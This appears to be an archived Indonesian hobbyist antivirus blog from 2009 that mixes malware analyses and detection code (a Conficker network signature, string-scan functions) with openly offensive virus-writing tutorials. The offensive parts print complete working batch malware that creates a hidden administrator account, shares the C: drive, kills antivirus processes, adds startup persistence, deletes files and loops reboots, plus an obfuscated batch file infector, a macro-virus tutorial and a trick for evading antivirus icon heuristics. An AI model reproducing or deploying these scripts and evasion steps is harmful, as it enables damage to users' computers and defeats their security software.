MorphostLab!

Thanks karena kamu sudah mengunjungi MorphostLab.
Berikut ini adalah artikel-artikel kami.

Trik Cegah Segala Variant Conficker! 14 Juli 2009
Virus NadiaSaphira atau Virus BuluBebek? 13 Juli 2009
Apa yang aneh dari Doomsday 2012? 2 Juni 2009
Tutorial Virus Macro (2) 15 Mei 2009
Pemrograman Virus Batch untuk Pemula (2) 14 Mei 2009
Teknik DeepScan Morphost Accords 11 Mei 2009
Trik Icon-Phic ditemukan! Loloskan virus dari heuristik Icon Antivirus! 11 Mei 2009
Pemrograman Virus Batch untuk Pemula 8 Mei 2009
Analisis Sampel Virus BugAV 6 Mei 2009
Tuntaskan sality!!! 4 Mei 2009
Checksum Conficker 30 April 2009
Script Cabe Rawit yang bikin Jahil 29 April 2009
Worm Conficker Tertangkap!!! 27 April 2009
Rancangan Perencanaan Morphost Antivirus versi enam 26 April 2009
Matikan Process Deep Freeze 6 5 Maret 2009
Parameter Command Untuk Antivirus 26 Februari 2009
Bahas Tuntas X-Fly.Worm 21 Februari 2009
Code Untuk Mengetik Sendiri 14 Februari 2009
Camfrog. Virus Atau Bukan? 8 Februari 2009
Aku Benci Sality 18 Januari 2009
Teknik Scanning Tanpa Morphost 10 Januari 2009
Fitur Baru Morphost Green 5 Januari 2009
Morphost Green Siap Gempur Virus Lokal 3 Januari 2009
Encrypt Databasemu! 28 Desember 2008
Teknik FastScanning Morphost 6 Desember 2008
Teknik CatchFDVirus Morphost Ditemukan! 29 Nopember 2008
Hajar X-Fly.Worm dengan Morphost Antivirus 14 Nopember 2008
Analisa Maxtrox.Worm 11 Nopember 2008
Repair Your DocFile 2 Nopember 2008
Analisa Susanti.Worm 24 Oktober 2008
Teknik Mutasi Virus 14 Oktober 2008
Hadapi Virus Baru dengan Morphost Baru 5 Oktober 2008
Morphost Versi Revision Siap Launching 29 September 2008
Analisa Global.Worm 29 September 2008
Analisa Word.Worm Alias W32.Worm 16 September 2008
Tutorial Membuat Virus Macro 11 September 2008
Tidak Bisa Menginstall karena Virus? 3 September 2008
Analisa Rieysha-Local.Worm 28 Agustus 2008
Analisa Amburadul.Worm 8 Agustus 2008
Analisa Rieysha-Desa.Worm 23 Agustus 2008
Analisa Nita.Worm 6 Agustus 2008
Morphost AV 2 August 2008 Version is coming 3 Agustus 2008
About Morphost Antivirus Versi 2 Agustus 2008 23 Juni 2008
Habisi Aksika 20 Juni 2008
Tutorial Encrypted VBS 18 Juni 2008
Download Morphost New Generation Antivirus 7 Mei 2008
Hajar Coolface Pake Morphost 7 Mei 2008
Morphost si Antivirus Baru Indonesia 1 April 2008

Trik Cegah Segala Variant Conficker!

Ini hanyalah trik…
dan aku yakin banyak comment masuk yang mengomentari artikel ini…

yah maklum lah… ini adalah trik yang termasuk kontroversial..
Ini Cuma buat mencegah virus Conficker yang masuk lewat flashdisk cuy. Dan dijamin ”hampir” (kira-kira 99% lah) semua varian Conficker akan diblok. Sekali lagi ingat! Ini Cuma untuk conficker yang masuk lewat flashdisk…

Sebelumnya perlu kamu tahu kalo sekarang sudah banyak sekali jenis conficker yang saya dapatkan. Dan sudah aku koleksi di rumah….
Gak tahu lah ntah itu benar conficker atau bukan. Kemungkinan besar banyak orang sekarang ini sok-sok buat virus dengan nama yang sama dengan Conficker.
Filenamenya ”jwgkvsq.vmx” cuy!!!

Oke kita anggap saja itu semua memang benar Virus Conficker…

Sebelum masuk ke inti artikel ini, ada yang mau kusampein. Sekitar beberapa hari yang lalu, setelah googling berjam-jam aku dapat code seperti berikut.

Conficker.A
Code:
alert tcp any any -> $HOME_NET 445 (msg:
“conficker.a shellcode”; content: “|e8 ff ff ff ff c1|^|8d|N|10
80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c
cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|& $HOME_NET 445 (msg: “conficker.b shellcode”;
content: “|e8 ff ff ff ff c2|_|8d|O|10 80|1|c4|Af|81|9MSu|f5|8|ae c6 9d
a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|Ise|c4 c4 c4|,|ed c4 c4 c4
94|&<O8|92|\;|d3|WG|02 c3|,|dc c4 c4 c4 f7 16 96 96|O|08 a2 03
c5 bc ea 95|\;|b3 c0 96 96 95 92 96|\;|f3|\;|24 |i|95 92|QO|8f f8|O|88
cf bc c7 0f f7|2I|d0|w|c7 95 e4|O|d6 c7 17 cb c4 04 cb|{|04 05 04 c3 f6
c6 86|D|fe c4 b1|1|ff 01 b0 c2 82 ff b5 dc b6 1f|O|95 e0 c7 17 cb|s|d0
b6|O|85 d8 c7 07|O|c0|T|c7 07 9a 9d 07 a4|fN|b2 e2|Dh|0c b1 b6 a8 a9 ab
aa c4|]|e7 99 1d ac b0 b0 b4 fe eb eb|"; sid: 2000002; rev: 1;)

Katanya sih itu jejak dari si Conficker. Gak tahu betul atau gak. Periksa sendiri aja ya..
Sebagian code diatas itu dalam bentuk Hexa.

Oke langsung ke inti.
Biasanya kalo conficker nginfeksi flashdisk, si Conficker bikin file berikut:
-File autorun
- jwgkvsq.vmx
-Folder RECYCLER
-folder S-5-3-42-2819952290-8240758988-879315005-3665
(Besok-besok kalian periksa aja ya…)

Tiga hal yang perlu diperhatikan dari ciri-ciri Conficker.
-induk-nya (yang ada di flashdisk) selalu berfilename ”jwgkvsq.vmx”
-ukuran induknya selalu diatas 150 KB
-ukuran file autorun.inf selalu diatas 55 KB

Yeah, aku yakin sebenarnya sudah banyak yang sadar akan 3 hal itu. Tapi yang jelas trik ini ampuh untuk varian-varian conficker loh.

Atau lebih gampangnya saja aku akan tuliskan code-nya yah…

Public Function IsConficker(namafile as string) as Boolean
Dim namaAja() as String
namaAja() = split(namafile, “\”)
Select case Lcase(namaAja(Ubound(namaAja)))
Case “jwgkvsq.vmx”
If filelen(namafile) > 153600 then IsConficker = True
Case “autorun.inf”
If filelen(namafile) > 56320 then IsConficker = True
Case else
Exit function
End select
End Function

Trik ini belum ku implementasikan pada Morphost. Yah karena udah terlalu banyak heuristic-heuristik aneh yang kutambah, masa yang ini juga kupake. He he he .Tapi liat nantilah.

Kalo kalian rasa code ini ampuh, silakan tambahkan code ini pada antivirus kalian. Bisa aja berkat code ini antivirus kalian bisa selangkah lebih maju daripada morphost antivirus.

Tapi code ini juga gak luput dari False Alarm. Dan biasanya setelah membaca artikel ini ada orang yang pengen bikin virus-virus palsu yang make ciri-ciri conficker di atas. Tujuan mereka hanya untuk membuktikan kalo code ini mengakibatkan false alarm. Yaahh.. biarkan saja lah mereka.

By: Morphic
Thanks to
-MorphostLab
-all readers

Kami atas nama MorphostLab menyatakan bahwa kami sangat membutuhkan kiriman virus anda sekalian…
Terima kasih…

Virus NadiaSaphira atau Virus BuluBebek?

Dari sekian banyak virus yang masuk ke 4shared-ku ini lah virus yang paling beruntung. Virus ini akan kita analisa bersama-sama nih…

NamaVirus : NadiaSaphira [Morphost], Trojan Horse [Symantec], Trojan Win32.VB.pod [Kaspersky Lab]
Ukuran : 53,256 bytes
MD5 : EE42ED66DBC99C7650E705543DFB145D
CRC32 : ECFDB755

Penyebaran File
-membuat file autorun.inf di drive “C:\” dan di “C:\windows\system32\” (untuk WinXP)
-membuat file [.ini] “c:\nadiasaphira.ini”, “c:\windows\taskmgr.ini”, “c:\windows\system32\msconfig.ini”, “c:\windows\system32\nadiasaphira.ini”
-membuat file “c:\windows\system32\MS586.sys”
-membuat file [.exe] “c:\windows\system32\allsys.exe”, “c:\windows\system32\wtoolsb.exe”, “c:\windows\system32\misconfig.exe”, “c:\windows\taskmgr.exe”

Process Virus Aktif
Secara default ada dua proses virus yang aktif:
-misconfig.exe = ”C:\windows\system32\misconfig.exe”
-taskmgr.exe = “C:\windows\taskmgr.exe

Modifikasi Registry
Ada banyak yang dimodif, tapi disini saya akan menjelaskan yang mencolok saja.
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\nofind”, 1, “REG_DWORD”
”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\nofind”, 1 , “REG_DWORD”
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\nofolderoptions”, 1 , “REG_DWORD”
“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile”, “File Folder”
“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\TileInfo”, “File Folder”
“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\InfoTip”, “File Folder”
Dan efek registry lainnya yang bisa saya tuliskan:
-Disable Regedit
-Ekstensi file tidak kelihatan
-dll

Penjelasan Tambahan
Virus ini tidak dipack. Atau virus ini dipack tapi tidak dipack secara sempurna. Mungkin si VM malas mengepack-nya. Dan saya rasa si VM pun tahu apa konsekuensi-nya kalo tidak mengepack virusnya. Dan Si VM bukan lupa mengepack-nya.
Nih kliatan alamat file project virus ini.
“D:\My VIRUS\New BuluBebek, Mau makan sinonggi, baje, atau minum ballo ya\mINUM cIU.vbp”
Biasany ada VM yang lupa mengepack dan secara gaksengaja namanya ikut tertampilkan pada alamat file Project-nya. Ha ha ha. VM macam apa itu. Eitss tapi tunggu. Bisa saja itu jebakan! Maksudnya bukan nama asli. Atau mungkin saja tujuannya mau menjebak orang lain?

Di dalam tubuh virus berkali-kali ditulis nama ”BuluBebek” dan ”NadiaSaphira”. Itu makanya aku jadi bingung ngasih nama virus ini. Tapi kebanyakan antivirus lain menyebut virus ini sebagai virus BuluBebek

Ok. Thanks. sekian

By:morphic
Thanks to:
-Tim MorphostLab
-Axer [Advertiser]
-Nash [VirusCaptor]
-Yudha [VirusCaptor]
-Morse [VirusAnalyst]
-Kholis[Independent]
-anak-anak smansa Medan
-to all readers

Apa yang aneh dari DoomsDay 2012?

DoomsDay 2012???

Aku rasa semua dah tahu tantangan dari Jasakom. Siapa yang bisa bikin remover virus itu, nantinya dikasih hadiah buku cuy!

Lalu apa yang istimewa dari virus itu… (mungkin sebagian dah tahu..)
Aku berani taruhan waktu kalian baca tantangan itu kalian pasti ngerasa ”aku pasti bisa”. Saya tidak meremehkan kalian.
Di akhir artikel ada tulisan ”3 antivirus terbesar di Indonesia gak sanggup menangani virus ini apalagi anda!” (tulisan ini kukutip loh, bukan aku yang bilang)

Yah secara fisik ciri-ciri virus itu:
Icon : Folder
Ukuran : 64.5 KB (66,048 bytes)
Filename : New Folder.exe (Eits,… jangan salah, kita liat nanti)

Sekitar dua hari yang lalu, ada orang yang mengirimi saya virus ini. Karena tertarik saya teliti deh…
Saya periksa Checksum CRC32, MD5, dan checksum lainnya. Dan hasilnya menunjukkan checksum file ini tidak dapat dihitung (hasilnya nol). MD5-nya sih ada tapi ya sama aja boong, folder windows biasa juga punya MD5 yang sama…

MD5=D41D8CD98F00B204E9800998ECF8427E

Yah, entah kenapa iseng-iseng aku bikin satu file dengan nama file yang sama dengan virus itu…
Dan hasilnya begini…

Aneh kan??? Udah tahu dimana letak anehnya???

Yah seharusnya kalo windows marah dong kalo ada dua file yang bernama sama di tempat yang sama… Seharusnya muncul pesan dibawah ini…

Ya gak coy… Atau kira-kira begitulah…

Kesimpulannya, nama file virus itu bukanlah “New Fólder”. Nama aslinya ádalah “New F?lder” (sebetulnya bukan nama asli sih… tapi arti kasarnya begitulah)
Coba kamu rename nama file virus itu dan copy deh nama filenya, lalu paste ke textbox VisualBasic kamu. (jangan ke notepad.)

Baru-baru ini aku dah buat satu software yang fungsinya mengubah teks ascii ke dalam bentuk Hexa dan juga sebaliknya….
Dan aku pake deh tuh software…

Hasilnya: 4E657720463F6C6465722E657865

Bandingkan dengan yang ini:

Hasllnya 4E657720466F6C6465722E657865

Jadi intinya di sini ada sedikit permainan….

Coba deh kamu rename nama file virus itu… Lalu periksa Checksum-nya….

Dan ini dia checksumnya (makan nih checksum…)
CRC32=AAD520D1
MD5=55310D4C6B38F3E6F1263D5D3D96DB8A

CMIIW (correct me if I wrong)

By:Morphic

Special thanks to:
-kedua orang tuaku
-Teman-teman sekelasku di kelas 3 kemarin… (tetap sukses kalian semua ya…)
-buat 5 anggota Tim MorphostLab
-semua pembaca

Tutorial Virus Macro (2)

Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.

Langsung aja.

Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11

Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :

Dim AD as object

Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :

set AD=ActiveDocument.VBProject.VBComponents.Item(1)

ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…

Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)
dim AD as object
set AD=ActiveDocument.VBProject.VBComponents.Item(1)

if AD.Name “Macroid” then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
end if

contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.

Ini contoh gambarnya…

Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.

Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…

Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security

Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…

Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.

Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:

Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”

Nah klo itu dah dilakukan, maka untuk berikut-berikutnya kalo kita mau ngetes virus macro kita udah bisa boss….

Sekian dulu tutorialnya, tunggu tutorial berikutnya ya….

By:Morphic
Karta_morphic@yahoo.co.id
http://www.morphostlab.co.nr

Thanks to :
MorphostLab

Pemrograman Virus Batch untuk Pemula (2)

Saya yakin disekitar anda pasti banyak sekali orang-orang yang sok tahu soal virus. Padahal kamu sendiri adalah VM. He he he.. yah maklum sajalah. Memang banyak sekali orang yang kayak gitu. Ciri-cirinya:
-kalo ngomong soal virus seolah-olah tahu lebih banyak padahal gak tahu apa-apa.
-sangat mendominasi kalo ngomong soal virus
-sok memberi info soal virus (padahal info yang dikasih tahunya salah).
-yang terakhir yang lebih parah, ngomong soal virus didepan kita … (kita = VM).

Yah, semua orang pasti pernah ngalaminnya. Ada teman saya yang bilang “kalo virus dibiarkan lama bisa menyerang semua file”.
Ha ha ha… itu omong kosong.
Gak ada hubungannya semakin lama virus dibiarkan bisa menyerang semua file. Yang benar itu, begitu virus dieksekusi virus akan menjalan semua command yang udah kita perintahkan. Yah kecuali memang udah ada di pasang penanggalannya. Misalnya tiap tanggal sekian virus akan bla bla bla… yah… begitu…

Yang perlu anda lakukan untuk menghadapi orang-orang seperti itu, kamu gak usah pamer skill.. yah biarkan aja dia tahu sendiri kalo kamu adalah VM. Dan yang perlu anda lakukan sekarang adalah meningkatkan dan menajamkan skill-mu sebagai VM.

Kalo kamu dah betul2 master di VB ato C++ ato delphi, gak ada salahnya kalo mempelajari batch juga…

Setelah lama browsing kemana-mana, akhirnya saya udah kumpulkan banyak script virus batch, dan diantara itu semua saya memilih script berikut:

Nama virus ini C_relwarC708 v1.0 yang dibuat oleh Technocrawl’s core member
Makan nih script…
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”
rem ****************************************************************************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem ****************************************************************************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus

yang paling menarik dari script di atas penggunaan mssge box-nya…
Ternyata dari batch juga bisa loh bikin mssgbox!

Ini nih aturannya:
msg * ”ketik pesan anda disini”

Simple kan? Ini beda dengan VB yang biasa kamu pake.

by: Morphic
thanks to:
MorphostLab

Teknik DeepScan Morphost Accords

Sebenarnya trik yang saya bahas di tutorial ini hanyalah trik biasa dan sederhana. Kenapa? Yah aku yakin banyak juga yang dah tahu teknik ini…

Sekarang banyak AVMaker yang masih make basis data / checksum saja… yah paling ditambah dengan sedikit heuristic…
Tapi menurut pengamatanku masih banyak juga yang belum make teknik ini. Padahal teknik ini lumayan ampuh…

Memang Morphost belum make teknik ini, yah karena saya sendiri masih belum banyak mengumpulkan string-string virus. Tapi yang jelas di versi berikutnya (morphost Accords), trik ini akan saya gunakan.

Teknik ini fungsinya untuk melihat ke dalam tubuh file. Apa yang dilihat? He he he jangan piktor…
Maksudnya disini teknik ini untuk melihat string-string sensitif virus yang ada di dalam tubuh file.

Neh, secara sederhana ini code-nya..

Public Sub Baca(namanyaapa As String)
Dim filedata As String
Dim a As Integer
Open namanyaapa For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
If InStr(1, filedata, “TypeyourStringHere”) > 0 Then
‘MsgBox ”Terinfeksi virus!”
End If
Close #1

End Sub

Tugasmu adalah mengganti ”TypeyourStringhere” dengan string virus apa saja. Yah lebih bagus lagi, tiap virus masing-masing memiliki 2 string. Biar gak false alarm.
Contohnya begini:

Public Sub Baca(namanyaapa As String)
Dim filedata As String
Dim a As Integer
Open namanyaapa For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
If InStr(1, filedata, “TypeyourStringHere”) > 0 Then
If instr( 1, filedata, “TypeyourstriingHeredua”)> 0 then
‘MsgBox “terinfeksi virus!”
End if
End If
Close #1

End Sub

Mau dijadikan sebagai fungsi juga bisa,,, contohnya begini.

function isInfected(namanyaapa As String) as boolean
Dim filedata As String
Dim a As Integer
Open namanyaapa For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
If InStr(1, filedata, “TypeyourStringHere”) > 0 Then
Isinfected = True
End If
Close #1

End function

Ini semua hanya contoh,, kamu juga bisa membuatnya jadi 3 perbandingan string atau lebih…

Teknik ini ampuh unutk mendeteksi alman loh…

BErikut contoh-contoh string virus yang sudah saya teliti dan saya analisa…. He he he
NItaworm=InfeksiFolder,AmbilDirektoriWindow
GavGent=GavGentForm, TmrGavGent
Kspoold=UKURAN_EKSTRAKTOR, kspoold.exe
Aksika=frmalina, httinimsg

By:Morphic
Thanks to:
Morphostlab

Trik Icon-Phic ditemukan! Loloskan virus dari Heuristik Icon Antivirus!

Ini nih trik gimana caranya biar virus-mu gak terdeteksi dengan heuristik icon. Yeah, lumayan kan?

Belakangan ini banyak AV yang udah make heuristic icon compare. Dengan heuristic ini, AV bisa mendeteksi virus-virus yang biasa make icon-icon basi… he he he…

Nih ada caranya supaya virusmu bisa lolos he he he ..
Teknik ini saya berinama teknik Icon-phic

FAKTA:
Icon folder sering dijadikan icon yang paling banyak digunakan pada virus oleh VM. Sebenarnya icon folder pun berbeda-beda. Mulai dari icon folder yang berwarna terang hingga ke warna yang dianggap pas menyerupai folder biasanya. Dan ada juga virus yang menggunakan icon folder lama.
KELEBIHAN
Mampu mengelabui user dengan sangaaaattt mudah.
KEKURANGAN
Antivirus lokal sekarang umumnya dilengkapi dengan heuristik pembandingan icon jadi umumnya virus yang menggunakan icon folder biasanya akan tertangkap dengan mudah. Bayangkan saja! Virus yang sudah dibuat dengan susah payah ternyata mudah ditangkap oleh antivirus!

Teknik Icon-phic: Icon folder memang diakui sebagai icon yang paling ampuh meski dianggap meniru. Penggunaan icon folder juga dianggap sebagai metode tua pada virus. Meski begitu yang terpenting adalah virus buatan kita sukses!
Ada cara supaya virus kita lolos dari scanning antivirus yang berheuristik Icon Compare. Yaitu dengan menggunakan software editor untuk icon. Kalau saya, biasanya saya menggunakan microsoft Visual C++ untuk mengedit icon.

Yang perlu anda lakukan adalah:
-Microsoft Visual C++
-icon folder

Langkah-langkah yang harus anda lakukan:

-Bukalah Ms. Visual C++
-Lalu Klik Open dan cari file icon folder agar kita edit.
-Lalu akan muncul gambar seperti gambar di atas.

-Lalu klik combobox Device. Di situ ada tiga pilihan.
-Pilih 48×48, 256 colors.
-Kemudian akan tampil gambar icon folder. Kemudian pilih tool ”pencil” pada kotak sebelah kanan Visual C++
-Lalu klik setitik pada gambar folder tadi (usahakan warna kuning agar tidak kelihatan pada gambar folder tersebut).
-Kemudian ulangi lagi langkah barusan pada pilihan 32×32, 256 colors dan 48×48, 256 colors.
-Setelah dilakukan pembubuhan setitik warna pada ketiga gambar, silakan save.
-Gunakan icon folder yang baru saja kita edit.
-virus kita tadi kemungkinan besar akan lolos scanning heuristik Icon Compare!

Saya jamin setelah anda menggunakan icon yang edit tadi, virus anda tidak akan terdeteksi heuristik icon oleh antivirus manapun bahkan virus anda juga lolos dari heuristik Morphost.
He he he

Ini teknik controversial. Dan saya rasa belum ada yang membahas teknik ini…

By:Morphic
Thnks to:
-MorphostLab
-Codenesia
-A.M.Hirin (Sekarang database morphost udah ada yang berformat .rax loh)
-semua pembaca dan pengunjung morphostLab
-semua pengguna antivirus Morphost
-dll

Pemrograman Virus Batch untuk Pemula

Kali ini saya akan ajarkan sdikit bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…

Pertama sekali ketik:
@echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…

Baru setelah itu kita ketik code-code virus lainnya… he he he

Ini contoh-contoh code-nya…

Untuk meng-kill process yang aktif:
Tskill AVGUARD

Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV

Untuk menghapus file:
del C:\Progra~1\Accessories\Calc.EXE

Untuk menulis ke regedit:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f

Untuk menampilkan messagebox
Msg * “Tulis pesanmu disini”

Dan masih banyak lagi contoh-contohnya….
Langsung aja neh salah satu virus batch yang saya tulis:
::written by Morphic
@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha”
cls
:Morphix
start %0
goto Morphix
::*Hanya untuk pembelajaran*

mau liat source batch yang lainnya???
Nih virus batch Rawut

@echo off
rem c0d3d by Vires @ tegal city
rem If u wanna know how this worx
rem don’t follow the code from top to bottom
rem but follow the flow of code
rem is it beautiful???yes it is!!!!
rem vires18[at]yahoo[dot]com
rem (c)2007,Indonesia
rem Dedicated to my Girl:S.S.Latifah(did u knew her b 4???)
rem Greetz to all my friends
rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
rem xniffer,kang hartono miyabi ,the_simpson,psycopath & all i forget
rem sorry!!!!!
goto v781i21r1212e23s4c5o677o85l
:n56a19m75a0101011
%res%%c00l% %gal%* %gal%bat
%l% pulangtegal
:t45e18g14a11l
%zhe% x=exe
%zhe% c=com
%zhe% fah=py
%l% v25i85r19e0s
:l08a80t19i85f08a19h
%zhe% sya=att
%zhe% gal=*.
%zhe% vi=fo
%sya%%res%%ah% %gal%* %s%
%zhe% ti=co
%l% t45e18g14a11l
:v25i85r19e0s
%zhe% d=txt
%zhe% la=do
%zhe% m=doc
%vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
%l% n56a19m75a0101011
:v18i17r16e15s
%zhe% s=-%vi%s -%vi%r -%vi%h
%zhe% res=r
%zhe% c00l=en
%l% l08a80t19i85f08a19h
:v781i21r1212e23s4c5o677o85l
set zhe=set
%zhe% te=in
%zhe% l=goto
%zhe% ah=ib
%zhe% lgu=mp3
%l% v18i17r16e15s
ulangtegal
rem Heh,BATCH STILL BEAUTIFUL RIGHT????
rem (c)vires

Analisis Sampel Virus BugAV

Ini analisis saya mengenai virus BugAV.

Saya mencoba (menjalankan) virus ini di tiga computer. 2 komputer warnet dan satunya lagi komputer saya sendiri…
Kenapa saya bisa nekat sampe-sampe ngejalaninnya di komputer sendiri? Yah ,karena si penulis virus sendiri bilang kalo virus ini Cuma virus biasa…

Yah,,, Cuma satu harapanku. Yaitu, mudah-mudahan virus ini gak menon-aktifkan system restore… he he he he..

Ciri-ciri fisik:
Filename : bugAV.exe
Icon : Microsoft Word
Size : 250,796 bytes

Komputer I: (komputer warnet)
Saat menjalankannya yang muncul pertama kali adalah microsoft word. Aku heran. Kenapa bisa ms.word tiba-tiba muncul. Tapi yang jelas ini bukan jadi masalah. Bisa aja secara gak sengaja memang ms.word terklik dua kali oleh tanganku…

Pertama, ku scan dengan morphost. Tidak terdeteksi. Yah karena memang signaturenya belum kutambah ke databasenya. He he he he…

Aku belum sempat lihat task manager secara mendetail, karena biaya warnet juga udah manggil…

Regedit OK. Gak ada masalah.

Komputer II: (komputer pribadi)
Komputer pribadiku agak berbeda nih… entah kenapa. Sebelum menghidupkan virus ini aku meng-create restore point. Supaya misalnya nanti ada apa-apa saya bisa mengembalikan komputerku ke semula…

